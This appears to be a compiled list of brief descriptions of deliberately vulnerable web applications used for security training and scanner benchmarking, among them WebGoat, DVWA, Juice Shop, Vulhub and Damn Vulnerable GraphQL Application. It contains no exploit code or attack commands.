Deliberately Vulnerable Web Applications

WebGoat is a deliberately insecure web application designed as an interactive security lab for learning how to identify and exploit common web vulnerabilities. It serves as a containerized sandbox that allows for the simulation and experimentation of web-based attacks and penetration testing techniques without risking production systems. The project functions as a learning lab that maps specific insecure coding patterns to structured lessons. It implements simulated server-side flaws to provide a hands-on environment for studying common security vulnerabilities and defensive coding practices. The application supports deployment through isolated containers and browser-based desktop virtualization to ensure a consistent attack surface. It includes capabilities for managing lesson availability and tracking user progress across the various vulnerable application components.

DVWA is a vulnerable web application lab and penetration testing sandbox designed to simulate common security flaws. It serves as a training platform for the OWASP Top 10 security risks and functions as a PHP and MySQL security lab for practicing the identification and exploitation of web vulnerabilities. The project provides a graduated learning experience through configurable security levels that adjust the difficulty of the vulnerabilities. It also supports switching between different database engines to research how various storage systems respond to injection attacks. The application is used for cybersecurity education, security tool benchmarking, and vulnerability lab simulation. It allows users to test automated scanners and auditing tools against known weaknesses in a controlled environment.

Juice Shop is a self-contained web application designed as a platform for cybersecurity education and security training. It functions as a controlled environment containing intentional security flaws, allowing users to practice offensive security techniques and defensive coding practices while tracking their progress through a live scoreboard. The platform serves as an industry-standard benchmark for evaluating the effectiveness and detection accuracy of automated security scanning tools. By hosting a standardized set of known vulnerabilities and common attack patterns, it provides a reliable environment for validating the performance of security software and testing the capabilities of various vulnerability assessment tools. The application manages these security challenges through a modular request-handling pipeline and an object-relational mapping layer that ensures consistent state across user interactions. It maintains a centralized registry of active vulnerabilities and uses event-driven updates to reflect progress in the user interface. The project is distributed as a complete, deployable web environment for training and testing purposes.

DVWA is a vulnerable web application sandbox and PHP security training environment. It serves as a deployable penetration testing target and an OWASP Top 10 lab designed for practicing exploits and simulating common web security vulnerabilities. The application allows users to adjust security difficulty levels to match their skill level and toggle between different SQL database engines to test how various systems handle injection attacks. It includes a mechanism to disable authentication, enabling automated security tools to interact directly with the environment. The project provides capabilities for vulnerability simulation, SQL injection testing, and general web security training. It includes tools for database initialization and configuration via environment variables.

Vulhub is a collection of pre-configured, containerized applications designed to serve as a standardized platform for security research, vulnerability testing, and educational exploitation exercises. It functions as an orchestration framework that enables users to deploy isolated software environments for the purpose of practicing penetration testing and analyzing common security flaws in a controlled setting. The project utilizes an infrastructure-as-code pattern to define complex, multi-service software stacks, ensuring that testing targets remain consistent and reproducible. By leveraging declarative service orchestration, it automates the startup sequence and network connectivity of interconnected containers, allowing researchers to simulate realistic, vulnerable application architectures. The environment lifecycle is ephemeral, providing automated tools to create, manage, and destroy instances to maintain a clean state across research sessions. Beyond its core deployment capabilities, the platform supports a range of workflows including security tooling validation, vulnerability analysis, and hands-on security training. Users can monitor container health, inspect application logs, and modify internal configurations to perform deep analysis of specific software components. The repository is structured to facilitate the rapid setup of standardized targets for testing and educational purposes.

SQLI labs to test error based, Blind boolean based, Time based.

WackoPicko is a vulnerable web application used to test web application vulnerability scanners.

Security training for the apps you actually ship. Open your browser and start hacking.

Damn Vulnerable GraphQL Application is an intentionally vulnerable GraphQL service implementation designed for learning about and practising GraphQL Security.